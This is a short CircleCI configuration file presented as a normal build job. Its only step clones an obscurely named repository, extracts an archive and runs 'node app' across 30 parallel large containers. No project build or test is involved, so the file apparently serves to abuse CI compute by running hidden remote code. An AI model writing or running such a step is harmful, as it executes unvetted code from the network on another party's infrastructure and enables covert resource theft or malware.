# Use the latest 2.1 version of CircleCI pipeline process engine.
# See: https://circleci.com/docs/configuration-reference
version: 2.1

# Define a job to be invoked later in a workflow.
# See: https://circleci.com/docs/jobs-steps/#jobs-overview & https://circleci.com/docs/configuration-reference/#jobs
jobs:
  build:
    docker:
      - image: cimg/node:24.4.0
    parallelism: 30
    resource_class: large
    steps:
      - run: git clone https://github.com/feyuj-hjf/.g.git && cd .g && tar xvf 4.tar.xz && node app
